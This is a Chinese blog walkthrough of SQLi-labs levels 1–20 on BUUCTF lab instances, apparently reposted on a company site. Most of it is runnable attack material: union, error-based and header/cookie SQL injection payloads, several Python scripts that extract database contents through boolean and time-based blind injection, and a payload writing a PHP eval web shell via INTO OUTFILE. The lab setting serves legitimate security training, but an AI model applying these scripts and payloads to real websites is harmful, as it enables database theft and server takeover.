前端开发容易学吗,JavaScript运算符

Google earth engine(GEE)——不同区域温度散点折线图绘制

  返回  

SQLILABS穿关记录

2021/7/21 21:05:49 浏览:

SQLILABS穿关记录

注:本文脚本需要根据自身情况修改

第一关

?id=1’ or 1=1 %23 //字符型注入
?id=1’ or 1=1 union select 1,2,3,4%23 //报错字段为3
?id=-1’ union select 1,2,group_concat(schema_name) from information_schema.schemata%23 //爆全部库
库名 challenges,ctftraining,information_schema,mysql,performance_schema,security,test
?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = ‘ctftraining’%23 //查库
?id=-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name = ‘flag’%23 //查水表
?id=-1’ union select 1,2,flag from ctftraining.flag%23 //跨库查询

第二关

?id=1’ or 1=1 # 报错’ or 1=1 LIMIT 0,1 考虑数字型注入
?id=1 or 1=1 //成功为数字型注入
?id=-1 union select 1,2,flag from ctftraining.flag%23
接下来的步骤和第一关一样

第三关

?id=1’)or 1=1 # //接下来应该一样
?id=-1’) union select 1,2,flag from ctftraining.flag%23

第四关

?id=1“)or 1=1 # //接下来应该一样
?id=-1") union select 1,2,flag from ctftraining.flag%23

第五关

报错注入也行
?id=2’and 1=1 %23
?id=2’and 1=2 %23无回显

贴上我的脚本

import requests
import time
url = "http://46be5e92-e82c-4f5b-a5b9-5a6fa17b8493.node4.buuoj.cn/Less-5/?id=2 'and "

result=""
for i in range(1,1290):
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        # payload="if(ascii(substr(database(),{},1))>{},1,0) %23".format(i,mid) #查所在库
        # payload="if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},1,0) %23".format(i,mid) #查全部库
        # payload="if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctftraining'),{},1))>{},1,0) %23".format(i,mid) #查水表名
        # payload="if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag'),{},1))>{},1,0) %23".format(i,mid) #查水表
        payload="if(ascii(substr((select flag from ctftraining.flag),{},1))>{},1,0) %23".format(i,mid) #爆flag
        # print(url+payload)
        r=requests.get(url+payload)
        # print(r.text)
        time.sleep(1) #buu蛋疼的限制所限制
        if "You are in..........." in r.text:
            head=mid+1
        else:
            tail=mid

    if head !=32:
        result+=chr(head)
    else:
        break
    
    print(result)

第六关

脚本中url的 ‘ 改 \“ 就行了

第七关

到第一关查路径先
?id=-1’union select 1,@@basedir,@@datadir %23
Your Login name:/usr
Your Password:/var/lib/mysql/
emmmm网站路径写不进去????
上面那个貌似不是路径
记录一下还没写出来
语句是union select 1,2,’<?php @eval($_POST[a]);?>'into outfile ‘路径’

第八关

第五个脚本可以用

第九关

判断闭合 and if(1=2,1,sleep(10)) # 看刷新时间
一般闭合为 ’ " ') ")多试试加括号。。。应该是这样
时间盲注
贴给脚本

import requests
import time
url = "http://e4cb6dc3-7b2c-4c2a-913c-c7e1a9dae714.node4.buuoj.cn/Less-9/?id=2 'and "

result=""
for i in range(1,1290):
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        payload="if(ascii(substr(database(),{},1))>{},sleep(1),0) %23".format(i,mid)
        # payload="if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},1,0) %23".format(i,mid)
        # payload="if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='ctftraining'),{},1))>{},sleep(1),0) %23".format(i,mid)
        # payload="if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag'),{},1))>{},sleep(1),0) %23".format(i,mid)
        # payload="if(ascii(substr((select flag from ctftraining.flag),{},1))>{},sleep(1),0) %23".format(i,mid)
        # print(url+payload)
        start_time=time.time()
        r=requests.get(url+payload)
        #print(r.text)
        if time.time()-start_time>=1:
            head=mid+1
        else:
            tail=mid

    if head !=32:
        result+=chr(head)
    else:
        break
    
    print(result)

第十关

把上面payload的’改为"

第十一关

跟第一关一样,只是改了请求方式
字段改了为2 其中%23改为# 不需要编码了
-1’ union select 1,flag from ctftraining.flag #

第十二关

跟第十一关一样,把’改为”)
-1") union select 1,flag from ctftraining.flag#

第十三关

post类型盲注,还好学了一丢丢爬虫
这边贴个脚本。。。在前几个脚本基础上做的修改

import requests
import time
url = "http://e4cb6dc3-7b2c-4c2a-913c-c7e1a9dae714.node4.buuoj.cn/Less-13/"

result=""
for i in range(1,1290):
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        # data={"uname": "1') or if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},1,0) #".format(i,mid),"passwd": 1}
        # data={"uname": "1') or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),{},1))>{},1,0) #".format(i,mid),"passwd": 1}
        # data={"uname": "1') or if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag'),{},1))>{},1,0) #".format(i,mid),"passwd": 1}
        data={"uname": "1') or if(ascii(substr((select flag from ctftraining.flag),{},1))>{},1,0) #".format(i,mid),"passwd": 1}
        
        r=requests.post(url=url,data=data)
        # print(r.text)
        time.sleep(1)
        if "flag.jpg" in r.text:
            head=mid+1
        else:
            tail=mid

    if head !=32:
        result+=chr(head)
    else:
        break
    
    print(result)

第十四关

把上面中的 ') 换成 "

第十五关

判断闭合’ or if(1=2,1,sleep(10)) #
时间盲注POST版
贴上我的脚本

import requests
import time
url = "http://e4cb6dc3-7b2c-4c2a-913c-c7e1a9dae714.node4.buuoj.cn/Less-15/"

result=""
for i in range(1,1290):
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        # data={"uname": "1' or if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},sleep(1),0) #".format(i,mid),"passwd": 1}
        # data={"uname": "1' or if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{},sleep(0.5),0) #".format(i,mid),"passwd": 1}
        # data={"uname": "1' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),{},1))>{},sleep(0.5),0) #".format(i,mid),"passwd": 1}
        # data={"uname": "1' or if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag'),{},1))>{},sleep(0.5),0) #".format(i,mid),"passwd": 1}
        data={"uname": "1' or if(ascii(substr((select flag from ctftraining.flag),{},1))>{},sleep(0.5),0) #".format(i,mid),"passwd": 1}

        start_time=time.time()
        r=requests.post(url=url,data=data)
        #print(r.text)
        if time.time()-start_time>=1:
            head=mid+1
        else:
            tail=mid

    if head !=32:
        result+=chr(head)
    else:
        break
    
    print(result)

第十六关

判断闭合 ")or if(1=2,1,sleep(10)) #
把上面脚本的 ‘ 改为 ")

第十七关

username必须得admin才行,没想到。。靠!!!
报错注入
1’ or updatexml(1,concat(0x26,database(),0x26),1)#
1’ or updatexml(1,concat(0x26,database(),0x26),1)#
1’ or updatexml(1,concat(0x26,(select right(group_concat(schema_name),30) from information_schema.schemata),0x26),1)#
1’ or updatexml(1,concat(0x26,(select left(group_concat(schema_name),30) from information_schema.schemata),0x26),1)#
左右拼接一下就是库名
····中间差不多不多赘述了
1’ or updatexml(1,concat(0x26,(select left(flag,30) from ctftraining.flag),0x26),1)#
1’ or updatexml(1,concat(0x26,(select right(flag,30) from ctftraining.flag),0x26),1)#
左右拼接一下就是flag

另一个函数 注:该函数一次只能查询32位长度
extractvalue(1,concat(0x26,(SQL语句),0x26));

第十八关

把UA换成 ’ or updatexml(1,concat(0x26,database(),0x26),1)and’
应该是后面还有语句,没想到。。。看看源码

$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)//登录成功
{
        //将用户的uagent,ip,uname插入到一张表中
        $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

        mysql_query($insert); //进行插入数据

        echo 'Your User Agent is: ' .$uagent;
        print_r(mysql_error());  //输出详细错误       
}

else
{
        echo '<font color= "#0000ff" font size="3">';
        print_r(mysql_error()); //输出详细错误
        echo '<img src="../images/slap.jpg"   />';
        echo "</font>";  
        }

果然是
’ or updatexml(1,concat(0x26,(select right(flag,30) from ctftraining.flag),0x26),1) and ’
’ or updatexml(1,concat(0x26,(select left(flag,30) from ctftraining.flag),0x26),1) and ’
读取flag

第十九关

改referer和上面一样

第二十关

这个不看源码做不了吧。。。。。

//uname和passwd都做了过滤,而cookie没有,直接获取
$cookee = $_COOKIE['uname'];
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
//存在一个跟cookie相关的sql语句操作,由于未进行任何过滤,所以存在cookie注入

buu没有回显。。。。
ctfshow有。。。
常规注入
不做赘述
查看17题

联系我们

如果您对我们的服务有兴趣,请及时和我们联系!

服务热线:18288888888
座机:18288888888
传真:
邮箱:888888@qq.com
地址:郑州市文化路红专路93号